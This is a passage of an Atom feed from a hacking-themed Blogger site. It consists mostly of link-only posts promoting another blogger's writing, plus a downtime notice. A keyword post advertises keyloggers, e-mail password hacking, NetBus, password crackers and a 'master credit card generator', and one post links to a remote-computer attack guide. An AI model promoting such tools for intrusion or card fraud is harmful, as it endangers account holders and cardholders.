<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4387334260922717220</id><updated>2012-02-13T12:15:44.464+05:30</updated><category term='Higher Truths'/><category term='Security Breach'/><category term='Olga in Haifa'/><category term='Windows Registry'/><category term='Making Money Online'/><category term='Hacking Lessons'/><category term='Philosophy'/><category term='Olga-Haifa-Nesher'/><category term='Password Cracking'/><category term='Tool of the day'/><category term='Information Security'/><category term='Hacking Wallpapers'/><category term='Basics of Virus Programming'/><category term='Life Lessons'/><category term='Breaking Security'/><category term='Basics Of Assembler'/><category term='Gorgeous Olga Lednichenko'/><category term='Romance'/><category term='S O L'/><category term='E Books'/><category term='dating advise'/><category term='Math Lessons'/><category term='Career'/><category term='Breach of privacy'/><category term='Relationship advise'/><category term='Search Engine'/><category term='Olga Lednichenko'/><category term='Higher Maths'/><category term='Pyshcology'/><category term='Hacking Test'/><title type='text'>It's not called H  A  C  K  I  N  G --------------------------------------&gt;&gt;&gt; It's  EXTENDED ACCESS</title><subtitle type='html'>This site does not claim to educate one on how to make the best use of internet or devise ways to make our machines work in the most productive way possible, it is on the other hand just a sincere effort on our part to make the resources available to the people who know - it is there, but don't know how to work their way around to get them. Hope to come good on our noble intentions!!! $</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>55</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-3685664167335047397</id><published>2008-09-06T20:42:00.001+05:30</published><updated>2008-09-06T20:43:58.938+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Romance'/><category scheme='http://www.blogger.com/atom/ns#' term='Relationship advise'/><category scheme='http://www.blogger.com/atom/ns#' term='dating advise'/><category scheme='http://www.blogger.com/atom/ns#' term='Gorgeous Olga Lednichenko'/><category scheme='http://www.blogger.com/atom/ns#' term='Olga Lednichenko'/><title type='text'>What is a Woman: By Olga Lednichenko: Something every thinking guy should know</title><content type='html'>http://olgalednichenko.wordpress.com/2008/08/28/olga-math-what-is-a-woman-every-man-should-read-by-olga-lednichenko/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-3685664167335047397?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/3685664167335047397/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=3685664167335047397' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3685664167335047397'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3685664167335047397'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2008/09/what-is-woman-by-olga-lednichenko.html' title='What is a Woman: By Olga Lednichenko: Something every thinking guy should know'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2827591494869931649</id><published>2008-09-06T20:39:00.004+05:30</published><updated>2008-09-06T20:41:53.360+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Gorgeous Olga Lednichenko'/><category scheme='http://www.blogger.com/atom/ns#' term='Philosophy'/><category scheme='http://www.blogger.com/atom/ns#' term='Pyshcology'/><category scheme='http://www.blogger.com/atom/ns#' term='Life Lessons'/><category scheme='http://www.blogger.com/atom/ns#' term='Olga-Haifa-Nesher'/><title type='text'>Please visist Olga Lednichenko's Blog: You will get an education on more than many things : and Its by Olga Lednichenko; Russian Israeli Blogger</title><content type='html'>Check this out: http://olgalednichenko.wordpress.com/new-photos/&lt;br /&gt;&lt;br /&gt;&lt;h2 class="title"&gt;Archive for the 'LEADERHSIP' Category&lt;/h2&gt;           &lt;div class="post hentry category-career-advise category-general-management category-human-psychology category-leaderhsip category-life-lessons category-lifes-musings category-mba-admissions category-olga-lednichenko category-management category-relationships tag-olga-lednichenko tag-life-decisions tag-glory-at-newmail-ru-listening tag-left-brain tag-right-brain tag-left-brain-versus-right-brain tag-thinking tag-axons tag-decision-making"&gt;    &lt;h2 id="post-968"&gt;&lt;a href="http://olgalednichenko.wordpress.com/2008/09/05/left-brain-or-right-brain-what-do-you-drive-by-olga-lednichenko/" rel="bookmark" title="Permanent Link to Left brain or Right brain? What do you drive? by Olga Lednichenko"&gt;Left brain or Right brain? What do you drive? by Olga Lednichenko&lt;/a&gt;&lt;/h2&gt;    • September 5, 2008 • &lt;a href="http://olgalednichenko.wordpress.com/2008/09/05/left-brain-or-right-brain-what-do-you-drive-by-olga-lednichenko/#respond" title="Comment on Left brain or Right brain? What do you drive? by Olga Lednichenko"&gt;No Comments&lt;/a&gt; (&lt;a href="http://olgalednichenko.wordpress.com/wp-admin/post.php?action=edit&amp;amp;post=968" title="Edit post"&gt;Edit&lt;/a&gt;)    &lt;p class="postmetadata"&gt;Posted in &lt;a href="http://wordpress.com/tag/career-advise/" title="View all posts in Career Advise" rel="category tag"&gt;Career Advise&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/general-management/" title="View all posts in General Management" rel="category tag"&gt;General Management&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/human-psychology/" title="View all posts in Human Psychology" rel="category tag"&gt;Human Psychology&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/leaderhsip/" title="View all posts in LEADERHSIP" rel="category tag"&gt;LEADERHSIP&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/life-lessons/" title="View all posts in Life Lessons" rel="category tag"&gt;Life Lessons&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/lifes-musings/" title="View all posts in Life's Musings" rel="category tag"&gt;Life's Musings&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/mba-admissions/" title="View all posts in MBA Admissions" rel="category tag"&gt;MBA Admissions&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/olga-lednichenko/" title="View all posts in Olga Lednichenko" rel="category tag"&gt;Olga Lednichenko&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/management/" title="View all posts in management" rel="category tag"&gt;management&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/relationships/" title="View all posts in relationships" rel="category tag"&gt;relationships&lt;/a&gt;    &lt;br /&gt;Tags: &lt;a href="http://wordpress.com/tag/olga-lednichenko/" rel="tag"&gt;Olga Lednichenko&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/life-decisions/" rel="tag"&gt;Life decisions&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/glory-at-newmail-ru-listening/" rel="tag"&gt;glory-at-newmail-ru-listening&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/left-brain/" rel="tag"&gt;Left Brain&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/right-brain/" rel="tag"&gt;Right Brain&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/left-brain-versus-right-brain/" rel="tag"&gt;Left brain versus Right Brain&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/thinking/" rel="tag"&gt;Thinking&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/axons/" rel="tag"&gt;Axons&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/decision-making/" rel="tag"&gt;Decision making&lt;/a&gt;   &lt;/p&gt;   &lt;/div&gt;      &lt;br /&gt;     &lt;div class="post hentry category-buddhism-and-eastern-stuff category-human-psychology category-leaderhsip category-life-lessons category-mba-admissions category-message-and-signalling category-olga-lednichenko category-psychology-versus-philosophy"&gt;    &lt;h2 id="post-954"&gt;&lt;a href="http://olgalednichenko.wordpress.com/2008/09/05/olga-math-what-is-freedom-what-is-liberty-by-olga-lednichenko/" rel="bookmark" title="Permanent Link to Olga Math: What is Freedom. What is Liberty. By Olga Lednichenko"&gt;Olga Math: What is Freedom. What is Liberty. By Olga Lednichenko&lt;/a&gt;&lt;/h2&gt;    • September 5, 2008 • &lt;a href="http://olgalednichenko.wordpress.com/2008/09/05/olga-math-what-is-freedom-what-is-liberty-by-olga-lednichenko/#respond" title="Comment on Olga Math: What is Freedom. What is Liberty. By Olga Lednichenko"&gt;No Comments&lt;/a&gt; (&lt;a href="http://olgalednichenko.wordpress.com/wp-admin/post.php?action=edit&amp;amp;post=954" title="Edit post"&gt;Edit&lt;/a&gt;)    &lt;p class="postmetadata"&gt;Posted in &lt;a href="http://wordpress.com/tag/buddhism-and-eastern-stuff/" title="View all posts in Buddhism and Eastern Stuff" rel="category tag"&gt;Buddhism and Eastern Stuff&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/human-psychology/" title="View all posts in Human Psychology" rel="category tag"&gt;Human Psychology&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/leaderhsip/" title="View all posts in LEADERHSIP" rel="category tag"&gt;LEADERHSIP&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/life-lessons/" title="View all posts in Life Lessons" rel="category tag"&gt;Life Lessons&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/mba-admissions/" title="View all posts in MBA Admissions" rel="category tag"&gt;MBA Admissions&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/message-and-signalling/" title="View all posts in Message and Signalling" rel="category tag"&gt;Message and Signalling&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/olga-lednichenko/" title="View all posts in Olga Lednichenko" rel="category tag"&gt;Olga Lednichenko&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/psychology-versus-philosophy/" title="View all posts in Psychology versus Philosophy" rel="category tag"&gt;Psychology versus Philosophy&lt;/a&gt;       &lt;/p&gt;   &lt;/div&gt;      &lt;br /&gt;     &lt;div class="post hentry category-general-management category-human-psychology category-international category-leaderhsip category-life-lessons category-mba-admissions category-olga-lednichenko category-management tag-coaching tag-executive-coaching tag-leadership tag-leadership-skills tag-leadership-versus-strategy-olga-lednichenko-blogger tag-management tag-olga-hiafa-blogger tag-values-and-ethics"&gt;    &lt;h2 id="post-899"&gt;&lt;a href="http://olgalednichenko.wordpress.com/2008/09/04/alchemy-exchange-liked-my-defintions-on-strategy-marketing-leaderhip-etc-asked-me-if-i-could-define-what-is-a-coach-come-on-guys-help-me-by-olga-lednichenko/" rel="bookmark" title="Permanent Link to Alchemy Exchange liked my defintions on Strategy. Marketing. Leaderhip etc: asked me if I could define what is a Coach: Come on guys help me : By Olga Lednichenko"&gt;Alchemy Exchange liked my defintions on Strategy. Marketing. Leaderhip etc: asked me if I could define what is a Coach: Come on guys help me : By Olga Lednichenko&lt;/a&gt;&lt;/h2&gt;    • September 4, 2008 • &lt;a href="http://olgalednichenko.wordpress.com/2008/09/04/alchemy-exchange-liked-my-defintions-on-strategy-marketing-leaderhip-etc-asked-me-if-i-could-define-what-is-a-coach-come-on-guys-help-me-by-olga-lednichenko/#comments" title="Comment on Alchemy Exchange liked my defintions on Strategy. Marketing. Leaderhip etc: asked me if I could define what is a Coach: Come on guys help me : By Olga Lednichenko"&gt;2 Comments&lt;/a&gt; (&lt;a href="http://olgalednichenko.wordpress.com/wp-admin/post.php?action=edit&amp;amp;post=899" title="Edit post"&gt;Edit&lt;/a&gt;)    &lt;p class="postmetadata"&gt;Posted in &lt;a href="http://wordpress.com/tag/general-management/" title="View all posts in General Management" rel="category tag"&gt;General Management&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/human-psychology/" title="View all posts in Human Psychology" rel="category tag"&gt;Human Psychology&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/international/" title="View all posts in International" rel="category tag"&gt;International&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/leaderhsip/" title="View all posts in LEADERHSIP" rel="category tag"&gt;LEADERHSIP&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/life-lessons/" title="View all posts in Life Lessons" rel="category tag"&gt;Life Lessons&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/mba-admissions/" title="View all posts in MBA Admissions" rel="category tag"&gt;MBA Admissions&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/olga-lednichenko/" title="View all posts in Olga Lednichenko" rel="category tag"&gt;Olga Lednichenko&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/management/" title="View all posts in management" rel="category tag"&gt;management&lt;/a&gt;    &lt;br /&gt;Tags: &lt;a href="http://wordpress.com/tag/coaching/" rel="tag"&gt;Coaching&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/executive-coaching/" rel="tag"&gt;Executive Coaching&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/leadership/" rel="tag"&gt;Leadership&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/leadership-skills/" rel="tag"&gt;Leadership Skills&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/leadership-versus-strategy-olga-lednichenko-blogger/" rel="tag"&gt;Leadership versus Strategy Olga Lednichenko Blogger&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/management/" rel="tag"&gt;management&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/olga-hiafa-blogger/" rel="tag"&gt;Olga Hiafa Blogger&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/values-and-ethics/" rel="tag"&gt;values and ethics&lt;/a&gt;   &lt;/p&gt;   &lt;/div&gt;      &lt;br /&gt;     &lt;div class="post hentry category-general-management category-haifa-and-nesher category-leaderhsip category-mba-admissions category-marketing category-olga-lednichenko category-startegy category-writing-and-editing category-management tag-olga-lednichenko tag-olga-haifa-blogger tag-marketing tag-leadership tag-change-management tag-strategy tag-business-blog tag-managers-guidelines tag-marketing-strategy tag-leadership-skills tag-operations tag-general-management tag-cute-olga tag-marketing-versus-strategy tag-leadership-versus-strategy"&gt;    &lt;h2 id="post-894"&gt;&lt;a href="http://olgalednichenko.wordpress.com/2008/09/03/strategymarketing-operations-management-leadership-defined-in-simple-to-understand-terms-by-olga-lednichenko/" rel="bookmark" title="Permanent Link to Strategy.Marketing. Operations. Management. Leadership: Defined -in simple to understand terms: By Olga Lednichenko"&gt;Strategy.Marketing. Operations. Management. Leadership: Defined -in simple to understand terms: By Olga Lednichenko&lt;/a&gt;&lt;/h2&gt;    • September 3, 2008 • &lt;a href="http://olgalednichenko.wordpress.com/2008/09/03/strategymarketing-operations-management-leadership-defined-in-simple-to-understand-terms-by-olga-lednichenko/#comments" title="Comment on Strategy.Marketing. Operations. Management. Leadership: Defined -in simple to understand terms: By Olga Lednichenko"&gt;4 Comments&lt;/a&gt; (&lt;a href="http://olgalednichenko.wordpress.com/wp-admin/post.php?action=edit&amp;amp;post=894" title="Edit post"&gt;Edit&lt;/a&gt;)    &lt;p class="postmetadata"&gt;Posted in &lt;a href="http://wordpress.com/tag/general-management/" title="View all posts in General Management" rel="category tag"&gt;General Management&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/haifa-and-nesher/" title="View all posts in Haifa and Nesher" rel="category tag"&gt;Haifa and Nesher&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/leaderhsip/" title="View all posts in LEADERHSIP" rel="category tag"&gt;LEADERHSIP&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/mba-admissions/" title="View all posts in MBA Admissions" rel="category tag"&gt;MBA Admissions&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/marketing/" title="View all posts in Marketing" rel="category tag"&gt;Marketing&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/olga-lednichenko/" title="View all posts in Olga Lednichenko" rel="category tag"&gt;Olga Lednichenko&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/startegy/" title="View all posts in STARTEGY" rel="category tag"&gt;STARTEGY&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/writing-and-editing/" title="View all posts in Writing and Editing" rel="category tag"&gt;Writing and Editing&lt;/a&gt;,  &lt;a href="http://wordpress.com/tag/management/" title="View all posts in management" rel="category tag"&gt;management&lt;/a&gt;    &lt;br /&gt;Tags: &lt;a href="http://wordpress.com/tag/olga-lednichenko/" rel="tag"&gt;Olga Lednichenko&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/olga-haifa-blogger/" rel="tag"&gt;olga-haifa-blogger&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/marketing/" rel="tag"&gt;Marketing&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/leadership/" rel="tag"&gt;Leadership&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/change-management/" rel="tag"&gt;Change Management&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/strategy/" rel="tag"&gt;Strategy&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/business-blog/" rel="tag"&gt;Business-blog&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/managers-guidelines/" rel="tag"&gt;Manager's Guidelines&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/marketing-strategy/" rel="tag"&gt;Marketing Strategy&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/leadership-skills/" rel="tag"&gt;Leadership Skills&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/operations/" rel="tag"&gt;Operations&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/general-management/" rel="tag"&gt;General Management&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/cute-olga/" rel="tag"&gt;Cute - Olga&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/marketing-versus-strategy/" rel="tag"&gt;Marketing versus Strategy&lt;/a&gt;, &lt;a href="http://wordpress.com/tag/leadership-versus-strategy/" rel="tag"&gt;leadership versus Strategy&lt;/a&gt;   &lt;/p&gt;   &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2827591494869931649?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2827591494869931649/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2827591494869931649' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2827591494869931649'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2827591494869931649'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2008/09/please-visist-olga-lednichenkos-blog.html' title='Please visist Olga Lednichenko&apos;s Blog: You will get an education on more than many things : and Its by Olga Lednichenko; Russian Israeli Blogger'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-8447391116444526752</id><published>2008-09-06T20:36:00.002+05:30</published><updated>2008-09-06T20:38:57.860+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Olga in Haifa'/><category scheme='http://www.blogger.com/atom/ns#' term='Gorgeous Olga Lednichenko'/><category scheme='http://www.blogger.com/atom/ns#' term='Olga Lednichenko'/><category scheme='http://www.blogger.com/atom/ns#' term='Higher Truths'/><category scheme='http://www.blogger.com/atom/ns#' term='Math Lessons'/><category scheme='http://www.blogger.com/atom/ns#' term='Higher Maths'/><title type='text'>Olga Lednichenko: Lessons in Math : Funny. Informative. Yet Phiolophical and Great:</title><content type='html'>And boy is she Gorgeous: click here: http://olgalednichenko.wordpress.com/?s=math&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-8447391116444526752?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/8447391116444526752/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=8447391116444526752' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8447391116444526752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8447391116444526752'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2008/09/olga-lednichenko-lessons-in-math-funny.html' title='Olga Lednichenko: Lessons in Math : Funny. Informative. Yet Phiolophical and Great:'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-8544190233274840999</id><published>2008-09-06T19:41:00.004+05:30</published><updated>2008-09-06T20:36:36.230+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Breach of privacy'/><category scheme='http://www.blogger.com/atom/ns#' term='Information Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Lessons'/><category scheme='http://www.blogger.com/atom/ns#' term='Olga Lednichenko'/><category scheme='http://www.blogger.com/atom/ns#' term='Security Breach'/><title type='text'>Olga Lednichenko has a Kick ass Blog On Security and Hacking :</title><content type='html'>Click here: http://olgalednichenko.wordpress.com/2008/09/06/a-basic-approach-attacking-a-remote-computer-by-guest-editor-olga-lednichenko/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-8544190233274840999?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/8544190233274840999/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=8544190233274840999' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8544190233274840999'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8544190233274840999'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2008/09/olga-lednichenko-has-kick-ass-blog-on.html' title='Olga Lednichenko has a Kick ass Blog On Security and Hacking :'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5617850049848346277</id><published>2007-06-04T18:19:00.000+05:30</published><updated>2007-06-04T18:22:20.724+05:30</updated><title type='text'></title><content type='html'>&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;THIS SITE WILL REMAIN UNAVAILABLE FOR FEW WEEKS!!!!!!!!!&lt;br /&gt;&lt;br /&gt;PLZ DO NOT MAIL TO ANY OF THE EMAIL ID'S&lt;br /&gt;&lt;br /&gt;TNX....&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5617850049848346277?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5617850049848346277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5617850049848346277' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5617850049848346277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5617850049848346277'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/06/this-site-will-remain-unavailable-for.html' title=''/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-262068766017920831</id><published>2007-05-25T12:16:00.000+05:30</published><updated>2007-05-31T17:39:50.311+05:30</updated><title type='text'>KEYWORDS</title><content type='html'>&lt;a href="http://hackingme.blogspot.com/search/label/E%20Books"&gt;&lt;strong&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;HACKING E BOOKS&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;span style="color: rgb(102, 0, 0);"&gt;&lt;strong&gt;,&lt;/strong&gt; &lt;strong&gt;&lt;a href="http://hackingme.blogspot.com/search/label/Breaking%20Security"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;PORT SCANNING&lt;/span&gt;&lt;/a&gt;, &lt;a href="http://hackingme.blogspot.com/search/label/Breaking%20Security"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;KEY LOGGER&lt;/span&gt;&lt;/a&gt;, &lt;a href="http://hackingme.blogspot.com/search/label/Password%20Cracking"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;E-MAIL PASSWORD&lt;/span&gt; &lt;span style="color: rgb(153, 0, 0);"&gt;HACKING&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;,&lt;/span&gt; &lt;a href="http://hackingme.blogspot.com/search/label/Tool%20of%20the%20day"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;NETBUS&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;,&lt;/span&gt; &lt;a href="http://hackingme.blogspot.com/search/label/Tool%20of%20the%20day"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;OPHCRACK&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;,&lt;/span&gt; &lt;a href="http://hackingme.blogspot.com/search/label/Tool%20of%20the%20day"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;LC5&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;,&lt;/span&gt; &lt;a href="http://hackingme.blogspot.com/search/label/Tool%20of%20the%20day"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;BRUTUS AET2&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;, &lt;a style="color: rgb(102, 0, 0);" href="http://hackingme.blogspot.com/search/label/E%20Books"&gt;REGEDIT&lt;/a&gt;, &lt;a style="color: rgb(153, 0, 0);" href="http://hackingme.blogspot.com/search/label/E%20Books"&gt;REGISTRY EDITOR&lt;/a&gt;,&lt;/span&gt; &lt;a href="http://hackingme.blogspot.com/search/label/Tool%20of%20the%20day"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;LCP&lt;/span&gt;&lt;/a&gt;, &lt;a href="http://hackingme.blogspot.com/search/label/Tool%20of%20the%20day"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;MASTER CREDIT CARD GENERATOR&lt;/span&gt;&lt;/a&gt;, &lt;a href="http://hackingme.blogspot.com/search/label/Tool%20of%20the%20day"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;CAIN &amp;amp; ABEL&lt;br /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-262068766017920831?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/262068766017920831/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=262068766017920831' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/262068766017920831'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/262068766017920831'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/05/keywords.html' title='KEYWORDS'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 